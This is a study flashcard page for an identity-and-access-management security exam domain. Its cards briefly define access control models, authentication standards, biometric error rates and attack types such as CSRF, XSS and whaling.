Brainscape's Knowledge GenomeTM

Browse over 1 million classes created by top students, professors, publishers, and experts.


See full index

Domain 5 > CF Domain 5 Flash Cards > Flashcards

CF Domain 5 Flash Cards

1
Q

Access Control System

A

Means to ensure that access to assets is authorized and restricted based on business and security requirements related to logical

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Access control tokens

A

The system decides if access is to be granted or denied based upon the validity of the token for the point where it is read based on time, date, day, holiday, or other condition used for controlling validation.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Accountability

A

ensures that account management has assurance that only authorized users are accessing the system and using it properly

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Attribute based access
control (ABAC)

A

This is an access control paradigm whereby access rights are granted to users with policies that combine attributes together

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

Authorization

A

The process of defining the specific resources a user needs and determining the type of access to those resources the user may have.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Active Directory Federation Services (ADFS)

A

identity access solution that provides client computers (internal or external to your network) with seamless SSO access to protected Internet-facing applications or services, even when the user accounts and applications are located in completely different networks or orgs

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

Crossover Error Rate
(CER)

A

point at which false acceptance (Type 2) error rate equals the false rejection (Type 1) error rate for a given sensor, in a given system and context; it is the optimal point of operation if the potential impacts of both types of errors are equivalent

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

Capability tables

A

list privileges assigned to subjects and identify the objects that subjects can access

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

Central Authentication Service (CAS)

A

an SSO implementation

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

Content-dependent control

A

Content-dependent access control adds additional criteria beyond identification and authentication: the actual content the subject is attempting to access; all employees of an org may have access to the HR database to view their accrued sick time and vacation time, but should an employee attempt to access the content of the CIO’s HR record, access is denied

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

Context-dependent access control

A

applies additional context before granting access, with time as a commonly used context

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

Cross-Site Request Forgery (CSRF)

A

(AKA XSRF) an attack that forces authenticated users to submit a request to a Web application against which they are currently authenticated

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

Discretionary access control
(DAC)

A

The system owner decides who gets access

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

False Acceptance Rate (Type
II FAR)

A

the percentage of identification instances in which unauthorized persons are incorrectly accepted.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

False Rejection Rate (Type I FRR)

A

the percentage of identification instances in which authorized persons are incorrectly rejected

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

Ethical Wall

A

the use of administrative, physical/logical controls to establish/enforce separation of information, assets or job functions for need-to-know boundaries or prevent conflict of interest situations; AKA compartmentalization

17
Q

Granularity of controls

A

level of abstraction or detail which in a security function can be configured or tuned for performance and sensitivity

18
Q

Identity as a Service
(IDaaS)

A

Cloud-based services that broker identity and access management functions to target systems on customers’ premises and/or in the cloud.

19
Q

Identity proofing

A

The process of collecting and verifying information about a person for the purpose of proving that a person who has requested an account, a credential, or other special privilege.

20
Q

Logical access control system

A

Non-physical system that allows access based upon pre-determined policies.

21
Q

Mandatory Access Controls
(MAC)

A

Access control that requires the system itself to manage access controls in accordance with the organization’s security policies.

22
Q

Multi factor authentication

A

Ensures that a user is who they claim to be. The more factors used to determine a person’s identity, the greater the trust of authenticity.

23
Q

Open Authorization
(OAuth)

A

The OAuth 2.0 authorization framework enables a third-party application to obtain limited access to an HTTP service, either on behalf of a resource owner by orchestrating an approval interaction between the resource owner and the HTTP service, or by allowing the third-party application to obtain access on its own behalf.

24
Q

Physical access control
system

A

An automated system that manages the passage of people or assets through an opening(s) in a secure perimeter(s) based on a set of authorization rules

25
Q

Rule based access control
(RBAC)

A

An access control model that is based on a list of predefined rules that determine what accesses should be granted.

26
Q

Role based access control
(RBAC)

A

An access control model that bases the access control authorizations on the roles (or functions) that the user is assigned within an organization.

27
Q

Security Assertion Markup
Language 2 .0 (SAML 2.0)

A

A version of the SAML OASIS standard for exchanging authentication and authorization data between security domains.

28
Q

Single factor
authentication

A

Involves the use of simply one of the three available factors solely in order to carry out the authentication process being requested.

29
Q

Self-service identity management

A

elements of the identity management lifecycle which the end-user (identity in question) can initiate or perform on their own (e.g. password reset, changes to challenge questions etc)

30
Q

Whaling attack

A

phishing attack targeting highly-placed officials/private individuals with sizeable assets authorizing large-fund wire transfers

31
Q

Cross-Site Scripting (XSS)

A

essentially uses reflected input to trick a user’s browser into executing untrusted code from a trusted site; these attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites; XSS attacks occur when an attacker uses a web app to send malicious code, generally in the form of a browser side script, to a different end user; flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it

32
Q

Cross-Site Tracing (XST)

A

attack involves the use of Cross-site Scripting (XSS) and the TRACE or TRACK HTTP methods; this could potentially allow the attacker to steal a user’s cookies

Domain 5 (2 decks)

Brainscape helps you reach your goals faster, through stronger study habits.
© 2024 Bold Learning Solutions. Terms and Conditions